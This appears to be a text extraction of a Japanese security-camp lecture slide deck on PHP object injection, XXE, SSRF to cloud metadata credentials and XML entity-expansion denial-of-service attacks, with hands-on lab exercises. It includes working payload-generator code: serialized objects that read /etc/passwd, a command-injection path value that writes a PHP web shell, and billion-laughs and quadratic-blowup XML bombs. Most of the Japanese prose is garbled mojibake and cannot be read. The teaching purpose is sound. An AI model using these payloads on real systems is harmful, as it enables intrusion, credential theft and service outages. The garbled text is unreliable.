Slide 57 text

҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ߈ܸํ๏ʢ1)1ͷ৔߹ʣ w 1)1Ͱ͸TFSJBMJ[F Λ࢖ͬͯΦϒδΣΫτΛγϦΞϥΠζՄೳ w ߈ܸʹ࢖͑ΔϚδοΫϝιουͱͯ࣍͠ͷ͕̎ͭ༗໊ w @@XBLFVQ ϝιου w @@EFTUSVDU ϝιου w γϦΞϥΠζ͞ΕͨจࣈྻΛVOTFSJBMJ[F ʹ౉͢͜ͱͰΦϒδΣΫτΛૠೖ ͢Δ߈ܸख๏੬ऑੑΛ1)10CKFDU*OKFDUJPOͱ͍͏

Slide 58

Slide 58 text

1SPQFSUZ0SJFOUFE1SPHSBNNJOH 1)1ಛ༗ͷςΫχοΫ w ϚδοΫϝιουΛ࣋ͭΫϥεΛ௨ͯ͡௚઀͸࣮ߦͰ͖ͳ͍ϝιουΛ ࣮ߦ͢Δ߈ܸख๏ w ΦϒδΣΫτͷϓϩύςΟʢΫϥεͷϝϯόม਺ʣΛ੍ޚ͠ɺ ΨδΣοτͱݺ͹ΕΔஅยతͳίʔυΛ࣮ߦ͠ɺ࠷ऴతͳ໨తΛୡ੒͢Δ w λʔήοτ಺෦ͷίʔυΛ࠶ར༻͢Δ$PEF3FVTF"UUBDLͷҰछ w ଞʹ͸301ɺ3FUVSOJOUPMJCD͕͋Δ

Slide 59

Slide 59 text

1SPQFSUZ0SJFOUFE1SPHSBNNJOH Πϝʔδਤ Ϋϥε Ϋϥε Ϋϥε Ϋϥε ΨδΣοτ ΨδΣοτ ΨδΣοτ ΨδΣοτ w ΨδΣοτͱݺ͹ΕΔஅยతͳίʔυΛ࣮ߦ͠ɺ࠷ऴతͳ໨తΛୡ੒͢Δ

Slide 60

Slide 60 text

1)1ಛ༗ͷςΫχοΫ class Example { private $obj; function __construct() { // some PHP code… } function __wakeup() { if (isset($this->obj)) return $this->obj->evaluate(); } } class CodeSnippet { private $code; function evaluate() { eval($this->code); } } // some PHP code... $user_data = unserialize($_POST['data']); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB w 1045ύϥϝʔλEBUB͸ VOTFSJBMJ[F ͞ΕΔ w ϚδοΫϝιου͸ &YBNQMFΫϥεʹ͋Δ w @@XBLFVQϝιουͰ͸ ม਺PCKͷFWBMVBUF Λ ࣮ߦ͢Δ w FWBM Λݺͼग़͢ $PEF4OJQQFUΫϥεͷ FWBMVBUF Λ࣮ߦ͍ͨ͠ʜ ࣮ߦ͍ͨ͠ʂʂʂ

Slide 61

Slide 61 text

1)1ಛ༗ͷςΫχοΫ w &YBNQMFΫϥεͷม਺PCK ʹ$PEF4OJQQFUΫϥεΛ ࢦఆ w $PEF4OJQQFUΫϥεͷ ม਺DPEFʹ࣮ߦͨ͠ ίʔυΛࢦఆ w ͜ͷΑ͏ͳಈ࡞Λ͢Δ γϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛࢦఆͰ͖Ε ͹0, class Example { private $obj; function __construct() { // some PHP code… } function __wakeup() { if (isset($this->obj)) return $this->obj->evaluate(); } } class CodeSnippet { private $code; function evaluate() { eval($this->code); } } // some PHP code... $user_data = unserialize($_POST['data']); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB $PEF4OJQQFUΫϥεʹॻ͖׵͑Δ ࣮ߦ͍ͨ͠ίʔυΛ ೖྗ

Slide 62

Slide 62 text

1)1ಛ༗ͷςΫχοΫ w γϦΞϥΠζ͞ΕͨΦϒδ ΣΫτΛੜ੒͢Δ1)1ίʔ υΛॻ͖ɺ࣮ߦ͢Δͱ ߈ܸίʔυ͕ಘΒΕΔ obj = new CodeSnippet; } } echo serialize(new Example); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB $ php pop-poc.php O:7:"Example":1:{s:12:"Exampleobj";O:11:"CodeSnippet":1: {s:17:"CodeSnippetcode";s:10:"phpinfo();";}}

Slide 63

Slide 63 text

1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ w ࣮ࡍʹ1SPQFSUZ0SJFOUFE1SPHSBNNJOHΛ΍Δʹ͸γϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛฤूͨ͘͠ͳΔ͜ͱ΋͋Δ w গ͚ͩ͠ฤू͍ͨ͠৔߹ɺίʔυ͔Βੜ੒͍ͯͯ͠͸໘౗ʜ w ਓྗͰಡΊΔΑ͏ʹͳ͓ͬͯ͘ͱϦΫΤετத͔ΒγϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛγϡοͱݟ͚ͭΒΕͯศརͳ͜ͱ΋͋Δ͔΋ʜ

Slide 64

Slide 64 text

1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ year = $year; } public function get_year(){ return $this->year; } } $object = new Seccamp(); $object->set_year(2021); echo serialize($object); w ࠨʹࣔ͢4FDDBNQΫϥεΛ ୊ࡐʹղઆ͍ͯ͘͠ w ϝϯόม਺ZFBSΛ࣋ͭ w TFU@ZFBSͱHFU@ZFBSͷͭ ͷϝιου͕͋Δ w TFU@ZFBSΛݺͼग़͠੔਺ Ληοτ͍ͯ͠Δ $ serialize-poc.php O:7:"Seccamp":1:{s:13:"Seccampyear";i:2021;}

Slide 65

Slide 65 text

1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ O:7:"Seccamp":1:{s:13:"Seccampyear";i:2021;} 0CKFDUΛࣔ͢0 จࣈ਺ Ϋϥε໊ ϓϩύςΟͷ਺ 4USJOHΛࣔ͢T จࣈ਺ จࣈྻ *OUFHFSΛࣔ͢J ਺஋

Slide 66

Slide 66 text

1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζϑΥʔϚοτৄઆ w CPPMFBO w CWBMVF w JOUFHFS w JWBMVF w EPVCMF w EWBMVF IUUQTJOTPNOJBTFDDPNEPXOMPBETQVCMJDBUJPOT1SBDUJDBM1)10CKFDU*OKFDUJPOQEG w /6-- w / w TUSJOH w TMFOHUIWBMVF w BSSBZ w BMFOHUI\LFZ WBMVFQBJST^

Slide 67

Slide 67 text

1SPQFSUZ0SJFOUFE1SPHSBNNJOH 301ʹࣅ͍ͯΔ w ίʔυͷஅยΛগ࣮ͣͭ͠ߦ͍͖ͯ͠ɺ࠷ऴతʹ໨ඪΛୡ੒͢Δͱ͜Ζ͕ 301ʹࣅ͍ͯΔ w όΠφϦʹର͢ΔFYQMPJUςΫχοΫͷߟ͑ํ͕8FCͷੈքʹԠ༻͞Ε͍ͯΔ Α͏Ͱɺ͓΋͠Ζ͍ʂʂ

Slide 68

Slide 68 text

ԋश0CKFDU*OKFDUJPOʢ෼ʣ w ࣍ͷίϚϯυΛೖྗ͢Δͱ%PDLFSίϯςφ্ཱ͕͕ͪΓ·͢ $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd exercise/object-injection/ $ docker-compose build $ docker-compose up

Slide 69

Slide 69 text

w IUUQMPDBMIPTUΛϒϥ΢βͰ։͘͜ͱͰԋश؀ڥʹ ΞΫηεͰ͖·͢ ԋश0CKFDU*OKFDUJPOʢ෼ʣ

Slide 70

Slide 70 text

ԋशղઆ0CKFDU*OKFDUJPO w ߨ࣮ٛࢪ࣌ʹ͸Ξοϓϩʔυ͍ͯ͠ͳ͔ͬͨ-FWFMɺ-FWFMΛ ղͨ͘ΊͷεΫϦϓτ͸(JU)VCϦϙδτϦʹ্͛ͯ͋Γ·͢ʂ w IUUQTHJUIVCDPNULNSVTFDDBNQCUSFFNBTUFSFYFSDJTF PCKFDUJOKFDUJPOTPMWFS

Slide 71

Slide 71 text

ԋशղઆ-FWFM

Slide 72

Slide 72 text

ԋशղઆ-FWFM w 4FUUJOHΫϥεͰ͸ϝϯόม਺QBUIʹࢦఆ͞ΕͨDPOpHKTPOΛ @@XBLFVQϝιουͰಡΈऔ͍ͬͯΔ w PCKFDUύϥϝʔλͰγϦΞϥΠζ͞ΕͨΦϒδΣΫτΛड͚औΓ VOTFSJBMJ[F͍ͯ͠Δ w QBUIΛFUDQBTTXEʹઃఆ͞Εͨ4FUUFJOHΫϥεΛγϦΞϥΠζͨ͠΋ͷ ΛPCKFDUύϥϝʔλʹࢦఆ͢ΔͱFUDQBTTXE͕ಡΈऔΕͦ͏ʂʂ ํ਑

Slide 73

Slide 73 text

ԋशղઆ-FWFM

Slide 74

Slide 74 text

ԋशղઆ-FWFM

Slide 75

Slide 75 text

ԋशղઆ-FWFM w 4FUUJOHΫϥεͰ͸ϝϯόม਺QBUIʹࢦఆ͞ΕͨDPOpHKTPOΛSFBEϝιουͰ ಡΈऔ͍ͬͯΔ w ͨͩ͠ɺ-FWFMͱҧͬͯ4FUUJOHΫϥε಺Ͱ͸ϚδοΫϝιου͕ͳ͍ʜ w .BJOΫϥεͰ͸ϚδοΫϝιου಺Ͱϝϯόม਺pMFͷSFBEϝιουΛ࣮ߦ͢Δ ͕pMFʹ͸OVMM͕ࢦఆ͞Ε͍ͯΔʜ w QBUIΛFUDQBTTXEʹઃఆ͞Εͨ4FUUJOHΫϥεΛ.BJOΫϥεͷϝϯόม਺ pMFʹࢦఆ͠ɺγϦΞϥΠζͨ͠΋ͷΛPCKFDUύϥϝʔλʹࢦఆ͢ΔͱFUD QBTTXE͕ಡΈऔΕͦ͏ʂʂ ํ਑

Slide 76

Slide 76 text

ԋशղઆ-FWFM path); echo $content; } } class Main { public $file = null; public function __destruct(){ $this->file->read(); } } $m = new Main(); $m->file=new Setting(); $m->file->path = "/etc/passwd"; echo serialize($m); ϖΠϩʔυΛੜ੒͢Δίʔυ

Slide 77

Slide 77 text

ԋशղઆ-FWFM

Slide 78

Slide 78 text

ԋशղઆ-FWFM

Slide 79

Slide 79 text

ԋशղઆ-FWFM w େମ-FWFMͱಉ͕ͩ͡ɺ4FUUJOHΫϥε಺Ͱ͸TZTUFNؔ਺Λ࢖͍ͬͯΔ w ೚ҙίʔυ࣮ߦͷνϟϯεʂʂʂ w DBUΛ࣮ߦͨ͠ޙʹͰίϚϯυΛ۠੾ͬͯFDIPίϚϯυͰXFCTIFMMͱͯ͠ ಈ࡞͢ΔQIQϑΝΠϧΛॻ͖ࠐΈͰ͖Δ w DBUDPOpHKTPOFDIPa QIQTZTUFN @(&5<DNE> aBQIQ w 1BUIʹˢ͕࣮ߦ͞ΕΔΑ͏ͳจࣈྻΛࢦఆ͢ΔͱΑͦ͞͏ʂʂʂ ํ਑

Slide 80

Slide 80 text

ԋशղઆ-FWFM path); } } class Main { public $file = null; public function __destruct(){ $this->file->read(); } } $m = new Main(); $m->file=new Setting(); $m->file->path = 'config.json; echo \'\' > a.php'; echo serialize($m); ϖΠϩʔυΛੜ੒͢Δίʔυ

Slide 81

Slide 81 text

ԋशղઆ-FWFM

Slide 82

Slide 82 text

ԋशղઆ-FWFM

Slide 83

Slide 83 text

͜͜·Ͱͷ·ͱΊ w ༷ʑͳϓϩάϥϛϯάݴޠʹσγϦΞϥΠζγϦΞϥΠζͷ࢓૊Έ͕࣮૷͞ Ε͍ͯΔ w Ϣʔβ͕ࣗ༝ʹγϦΞϥΠζ͞ΕͨσʔλΛࢦఆͰ͖Δঢ়گ͸ةݥ w ϚδοΫϝιουΛ༻͍Ε͹༰қʹ3$&ʹ·Ͱ࣋ͪࠐΊΔ

Slide 84

Slide 84 text

ٳܜʢ෼ʣ

Slide 85

Slide 85 text

ୈ̏ষɿ 9.-ύʔαΛૂͬͨ߈ܸ

Slide 86

Slide 86 text

9.-ͷ༻్ 9.-ͱ͸ w 9.-ʢF9UFOTJCF.BSLVQ-BOHVBHFʣ͸ϚʔΫΞοϓݴޠͷͻͱͭ w ϚʔΫΞοϓݴޠςΩετϑΝΠϧͷதʹɺςΩετͱಛఆͷه߸Λ ૊Έ߹Θͤɺ෇Ճ৘ใΛهड़ͨ͠΋ͷɻ)5.-ͳͲ w ֤छઃఆϑΝΠϧͷϑΥʔϚοτʹͳ͍ͬͯΔ͜ͱ͕ଟ͍ w "OESPJE.BOJGFTUYNMͳͲ

Slide 87

Slide 87 text

9.-ͷߏ଄ 9.-ͷྫ w λάͷೖΕࢠߏ଄Ͱσʔλ͕දݱ͞ΕΔ ]> झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ খ஛ହҰ B MFDUVSFTλάͷ಺༰Λఆٛ MFDUVSFTλάΛ࢖ͬͯ಺༰Λهࡌ

Slide 88

Slide 88 text

9.-ͷߏ଄ w ཁૉΛఆ͍ٛͯ͠ΔՕॴΛ%5%ʢ%PDVNFOU5ZQF%FpOJUJPOʣͱ͍͏ ]> झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ খ஛ହҰ B 9.-ͷྫ MFDUVSFTλάΛ ఆٛ͢Δ%5%

Slide 89

Slide 89 text

9.-ͷߏ଄ w ྫʹ্͛ͨ9.-Ͱ͸MFDUVSFTλάͷߏ੒ཁૉɺଐੑΛఆ͍ٛͯͨ͠ w &OUJUZͱݺ͹ΕΔ໊લ෇͖ఆ਺ͷఆٛ΋Ͱ͖Δ %5%ʹΑͬͯఆٛ͞ΕΔ΋ͷ

Slide 90

Slide 90 text

9.-ͷߏ଄ w ఆ਺Λද͢&OUJUZʹ͸*OUFSOBM&OUJUZͱ&YUFSOBM&OUJUZͷ̎छྨ͕͋Δ w 4:45&.ΩʔϫʔυΛ༻͍ͯ63*εΩʔϜ͔Β஋ΛऔಘͰ͖Δ w 8FCϖʔδͷ63-΍ϩʔΧϧͷϑΝΠϧύεΛࢦఆͯ͠ ֎෦͔Β஋Λऔಘ͢Δͷ͕&YUFSOBM&OUJUZ *OUFSOBM&OUJUZͱ&YUFSOBM&OUJUZ ]> &xml-file &txt-file

Slide 91

Slide 91 text

9.-FYUFSOBMFOUJUZJOKFDUJPO ֓ཁ w Ϣʔβ͕ࢦఆͨ͠9.-ϑΝΠϧΛॲཧ͢ΔΞϓϦέʔγϣϯ͕͋Δͱ͢Δ w &YUFSOBM&OUJUZΛ༻͍ͯϩʔΧϧͷϑΝΠϧɺ಺෦ωοτϫʔΫͷΞυϨε Λࢦఆͨ͠9.-ϑΝΠϧΛΞϓϦέʔγϣϯʹॲཧͤ͞Δ͜ͱͰ ຊདྷ͸Ϣʔβ͕஌Γಘͳ͍৘ใΛऔಘͰ͖Δ w ͜ͷ߈ܸख๏͸9.-&YUFSOBM&OUJUZʢ99&ʣJOKFDUJPOͱݺ͹ΕΔ ]>

Slide 92

Slide 92 text

9.-FYUFSOBMFOUJUZJOKFDUJPO 443'΁ͭͳ͛Δ w ݱ୅ͷ8FCΞϓϦέʔγϣϯ͸αʔό̍ͭͰಈ͍͍ͯΔ͜ͱ͸গͳ͘ɺ༷ʑ ͳαʔό͕૊Έ߹Θͬͯ͞ಈ͍͍ͯΔ w ຊདྷϢʔβ͔Β͸ΞΫηεͰ͖ͳ͍ɺ಺෦৘ใʹΞΫηε͢Δ߈ܸ͕443' w ֎෦͔Β͸ΞΫηεͰ͖ͳ͍ɺ಺෦ωοτϫʔΫ্ʹଘࡏ͍ͯ͠Δαʔό͕ ର৅ʹͳΔ

Slide 93

Slide 93 text

9.-FYUFSOBMFOUJUZJOKFDUJPO &$ͷNFUBEBUBͷऔಘ w "84&$Ͱ͸಺෦ΞυϨεʹΫϨσϯγϟϧΛอ͍࣋ͯ͠Δ w IUUQTMBUFTUNFUBEBUBJBNTFDVSJUZDSFEFOUJBMT w গ͠લ·Ͱɺ&YUFSOBM&OUJUZΛ্͔ͭͬͯهΞυϨεʹΞΫηε͢Δͱ FYUFSOBMFOUJUZJOKFDUJPO͔Β443'ʹൃలͤ͞ΒΕͨ ]> &aws-metadata

Slide 94

Slide 94 text

9.-FYUFSOBMFOUJUZJOKFDUJPO *.%4WʹΑΔ&$ͷ؇࿨ࡦ w ݱ୅Ͱ΋&$্ͰʹΫϨσϯγϟϧ͸ଘࡏ͢Δ͕ ؆୯ʹ͸ΞΫηεͰ͖ͳ͍ w ࣄલʹ165ϦΫΤετͰऔಘͨ͠τʔΫϯ͕ඞਢʹͳͬͨ w 9.-ͷFOUJUZ͔Β͸165ϦΫΤετ͸ඈ͹ͤͳ͍ͨΊɺ FYUFSOBMFOUJUZJOKFDUJPO͔ΒΫϨσϯγϟϧΛऔಘ͢Δ͜ͱ͸Ͱ͖ͳ͍ w (PQIFSϓϩτίϧΛ࢖͑͹*.%4W͕༗ޮͰ΋ΫϨσϯγϟϧΛऔಘՄೳ͕ͩ 9.-ύʔαͱؔ܎ͳ͍࿩ʹͳͬͯ͠·͏ͷͰ͜͜Ͱ͸ׂѪ

Slide 95

Slide 95 text

9.-FYUFSOBMFOUJUZJOKFDUJPO ରࡦ w 9.-ϑΝΠϧ͸ػೳ͕๛෋Ͱѻ͍͕Ή͔͍ͣ͠ͷͰ+40/ϑΝΠϧͳͲͷ ଞͷϑΝΠϧϑΥʔϚοτΛࢦఆ͢Δ w 9.-ύʔα͕%5%Λॲཧ͠ͳ͍Α͏ʹػೳΛ੍ݶ͢Δ

Slide 96

Slide 96 text

(IJESBͰͷྫ ࣄલ՝୊̍ w (IJESBʹ͸99&ͷ੬ऑੑ͕ͭ͋Δʢ೥݄࣌఺ʣ w $7& w $7& w ࠶ݱ؀ڥΛ࡞੒ͯ͠ɺ࣮ࡍʹ੬ऑੑΛ߈ܸͯ͠΋Β͏՝୊Λग़͍ͯ͠·ͨ͠

Slide 97

Slide 97 text

$7& w όʔδϣϯҎԼͷ(IJESBʹଘࡏ͍ͯͨ͠੬ऑੑ w ϓϩδΣΫτ৘ใΛอଘ͍ͯ͠ΔϓϩδΣΫτϑΝΠϧʢHQSʣͷ಺෦ʹ 9.-ϑΝΠϧʢQSPKFDUQSQʣ͕ଘࡏ͢Δ w QSPKFDUQSQΛύʔε͢Δࡍʹ99&͕ՄೳͰ͋ͬͨ ࣄલ՝୊ղઆ

Slide 98

Slide 98 text

$7& w 99&ΛҾ͖ى͜͢9.-ϑΝΠϧͷྫ ࣄલ՝୊ղઆ %dtd; ]>

Slide 99

Slide 99 text

$7& w όʔδϣϯҎԼͷ(IJESBʹଘࡏ͍ͯͨ͠੬ऑੑ w (IJESBʹ͸σϑΥϧτͰ͸༗ޮʹͳ͍ͬͯͳ͍ɺ࣮ݧతͳػೳ͕ଘࡏ͢Δ w 9.-ϑΝΠϧʹهࡌ͞ΕͨύλʔϯͰόΠφϦ಺Λݕࡧ͢Δ 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹ੬ऑੑ͕ଘࡏͨ͠ ࣄલ՝୊ղઆ

Slide 100

Slide 100 text

$7& w $PEF#SPXTFSͷ'JMFϝχϡʔ͔Β$POpHVSFʜΛબ୒͢Δͱ $POpHVSF&YQFSJNFOUBM1MVHJOT΢Οϯυ΢͕։͔ΕΔ w 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹνΣοΫΛ͍ΕΔͱର৅ػೳ͕ ༗ޮʹͳΔ ࣄલ՝୊ղઆ

Slide 101

Slide 101 text

$7& w 8JOEPX'VODUJPO#JU1BUUFSOT&YQMPSFSΑΓμΠΞϩάΛग़ͤΔ w 3FBE9.-'JMFTϘλϯΛΫϦοΫ͢Δ͜ͱͰ9.-ϑΝΠϧΛಡ·ͤΒΕΔ ࣄલ՝୊ղઆ

Slide 102

Slide 102 text

$7& w 'VODUJPO#JU1BUUFSOT&YQMPSFS1MVHJOʹಡ·ͤΔ9.-ϑΝΠϧΛੜ੒͢Δ ඞཁ͕͋Δɻ w 4DSJQU.BOBHFS͔Β%VNQ'VODUJPO1BUUFSO*OGP4DSJQUΛ࣮ߦ͢Δͱ બ୒͍ͯ͠Δؔ਺ͷ๯಄ͷػցޠ΍ΞυϨεͳͲͷ৘ใΛهͨ͠9.-ϑΝΠ ϧ͕ग़ྗ͞ΕΔ w ग़ྗ͞Εͨ9.-Λฤूͯ͠ಡΈࠐΉ͜ͱͰ99&Λߦ͑Δ ࣄલ՝୊ղઆ

Slide 103

Slide 103 text

$7& w 99&ΛҾ͖ى͜͢9.-ϑΝΠϧͷྫ ࣄલ՝୊ղઆ TODO: url x86:LE:64:default ʢলུʣ nc 127.0.0.1 5000

Slide 104

Slide 104 text

͜͜·Ͱ͸Α͘ղઆ͞Ε͍ͯΔ࿩ 9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏ w 99&͸̎ͭʹ෼ྨͰ͖Δ w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM w 99&ͷଞʹ΋9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏͕͋Δ w #JMMJPOMBVHITʢ&YQPOFOUJBMFOUJUZFYQBOTJPOʣ w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w %FDPNQSFTTJPO#PNCͳͲ

Slide 105

Slide 105 text

1ZUIPOΛ࢖ͬͯղઆ͠·͢ʂ w 1ZUIPOʹ͸9.-ύʔα͕ඪ४ϥΠϒϥϦͱͯ͠ଟ਺උΘ͍ͬͯΔ w ̍ͭͷݴޠͰෳ਺ͷ9.-ύʔαΛର৅ʹ؆୯ʹ1P$Λॻ͚ΔͨΊ ղઆʹ޲͍͍ͯΔ ଞͷ9.-ύʔαΛର৅ͱ͢Δ߈ܸख๏

Slide 106

Slide 106 text

1ZUIPOͷஶ໊9.-ϥΠϒϥϦ 1ZUIPOެࣜαΠτهࡌͷඪ४ϥΠϒϥϦͨͪ IUUQTEPDTQZUIPOPSHMJCSBSZYNMIUNMYNMWVMOFSBCJMJUJFT ͖ͬ͞ղઆͨ͠99&

Slide 107

Slide 107 text

%FGVTFEYNMΛ࢖͏ͱηΩϡΞʹͳΔ 1ZUIPOͷஶ໊9.-ϥΠϒϥϦ

Slide 108

Slide 108 text

%FGVTFEYNMΛ࢖͏ͱηΩϡΞʹͳΔ w 1ZUIPOͷஶ໊ͳ9.-ϥΠϒϥϦͷϥούʔ w ηΩϡΞʹ9.-Λѻ͏ػೳΛ෇Ճͯ͘͠ΕΔ w JNQPSUจΛࠩ͠ସ͑Δ͚ͩͰηΩϡΞʹͳͬͯศར 1ZUIPOͷஶ໊9.-ϥΠϒϥϦ

Slide 109

Slide 109 text

1ZUIPOͷஶ໊9.-ϥΠϒϥϦ %FGVTFEYNMͷ3&"%.&ʹ͸΋ͬͱৄ͍͠ද͕هࡌ͞Ε͍ͯΔ IUUQTQZQJPSHQSPKFDUEFGVTFEYNM

Slide 110

Slide 110 text

ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM w %FDPNQSFTTJPO#PNC ΠϚίί

Slide 111

Slide 111 text

#JMMJPO-BVHIT 9.-ʹΑΔ%P4߈ܸ w ΤϯςΟςΟΛ܁Γฦ͠ࢀরͤ͞Δ͜ͱʹΑͬͯ$16΁ͷෛՙɺϝϞϦফඅ ྔΛ্͛Δ%P4߈ܸ w αʔό΁େྔͷΞΫηεΛߦ͍ಈ࡞Λෆ҆ఆʹͤ͞Δͷ͕%P4߈ܸͩͱ ޡղ͞Ε͕ͪ w ΞϓϦέʔγϣϯͷಈ࡞͕ෆՄೳʹͳΔΑ͏ͳɺ ҟৗʹಈ࡞ΛҾ͖ى͜͢ͷ͕%P4߈ܸͰ͋ͬͯखஈ͸ԿͰ΋ྑ͍ w 9.-CPNC΍FYQPOFOUJBMFOUJUZFYQBOTJPO߈ܸͱ΋ݺ͹ΕΔ

Slide 112

Slide 112 text

#JMMJPO-BVHIT 9.-ϑΝΠϧྫ w MPMʢMPUTPGMBVHITʣͱ͍͏ΠϯλʔωοτεϥϯάΛ༻͍ͨϑΝΠϧ͕༗໊ w ͦͷͨΊ#JMMJPO-BVHITͱ໊෇͚ΒΕ͍ͯΔ ]> &lol9;

Slide 113

Slide 113 text

#JMMJPO-BVHIT ༗ޮͳ1ZUIPOϥΠϒϥϦ IUUQTQZQJPSHQSPKFDUEFGVTFEYNM

Slide 114

Slide 114 text

ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ #JMMJPO-BVHITΛࢼ͢ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ #JMMJPO-BVHITΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞ $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/billion-laughs $ cd etree $ docker build . -t billion-laughs-etree $ docker run billion-laughs-etree

Slide 115

Slide 115 text

Өڹ͸ϥΠϒϥϦͦΕͧΕ w 9.-Λύʔε͢Δ࣮૷͕ͦΕͧΕҟͳΔͨΊӨڹ౓߹͍΋ҟͳΔ w FUSFFʹ͸࠷ߴʹࢗ͞Δʂ #JMMJPO-BVHITΛࢼ͢

Slide 116

Slide 116 text

ղઆ͍ͯ͘͠੬ऑੑ 9.-ʹΑΔ%P4߈ܸ w #JMMJPO-BVHIT w 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO w &YUFSOBMFOUJUZFYQBOTJPO w %5%3FUSJFWBM w %FDPNQSFTTJPO#PNC ΠϚίί

Slide 117

Slide 117 text

2VBESBUJD#MPXVQFOUJUZFYQBOTJPO w #JMMJPO-BVHITʹࣅ͍ͯΔ w ೖΕࢠʹͳͬͨ&OUJUZΛ࢖༻͢ΔͷͰ͸ͳ͘ɺ਺ઍจࣈͷจࣈྻΛද͢େ͖ͳ &OUJUZΛ܁Γฦ͠ෳ੡ͯ͠ϝϞϦফඅΛૂ͏ w ,#ఔ౓ͷ9.-ϑΝΠϧͰɺ.#͔Β਺(#ͷϝϞϦΛফඅͤ͞ΒΕΔ 9.-ʹΑΔ%P4߈ܸ

Slide 118

Slide 118 text

2VBESBUJD#MPXVQFOUJUZFYQBOTJPO w ڊେͳจࣈྻʢ"""""""""""""""ʜʣ͕ೖͬͨΤϯςΟςΟʢYʣΛ ෳ਺ճݺͼग़͢͜ͱͰലେͳϝϞϦফඅΛૂ͏ w ࢦ਺ؔ਺తʹϝϞϦফඅྔ͕૿େ͢Δ#JMMJPO-BVHIT΄Ͳޮ཰తͰ͸ͳ͍ w ਂ͍ೖΕࢠʹͳͬͨΤϯςΟςΟΛېࢭ͢ΔύʔαͷରࡦΛ͢Γൈ͚ΒΕΔ ]> &x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;(লུ) 9.-ϑΝΠϧྫ

Slide 119

Slide 119 text

2VBESBUJD#MPXVQFOUJUZFYQBOTJPO 9.-ϑΝΠϧྫ w ڊେͳจࣈྻΛද͢ͷͰ9.-ϑΝΠϧͦͷ··Λจࣈྻͱͯ͠ѻ͏ΑΓ ίʔυதͰ9.-ϑΝΠϧΛ૊ΈཱͯΔ΄͏͕ѻ͍΍͍͢ size = 55000 entity = 'A' * size refs = '&x;' * size data = '''\ ]> {entityReferences} '''.format(entity=entity, entityReferences=refs)

Slide 120

Slide 120 text

༗ޮͳ1ZUIPOϥΠϒϥϦ IUUQTQZQJPSHQSPKFDUEFGVTFEYNM 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO

Slide 121

Slide 121 text

2VBESBUJDCMPXVQFOUJUZFYQBOTJPOΛࢼ͢ ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ 2VBESBUJDCMPXVQΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞ $ git clone git@github.com:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/quadratic-blowup/ $ cd etree $ docker build . -t quadratic-blowup-etree $ docker run quadratic-blowup-etree

Slide 122

Slide 122 text

ଞͷύʔαͰ΋͍͚ΔͷͰ͸🤔ʁ w #JMMJPO-BVHIT2VBESBUJDCMPXVQFOUJUZFYQBOTJPO͸9.-ϑΝΠϧ͕ ࣋ͭࢀরػೳΛѱ༻͢Δ੬ऑੑ w ଞʹಉ༷ͷػೳ͕͋ΔϑΝΠϧ͕͋Ε͹ಉ͡ςΫ͕࢖͑ͦ͏🤔ʂʁ

Slide 123

Slide 123 text

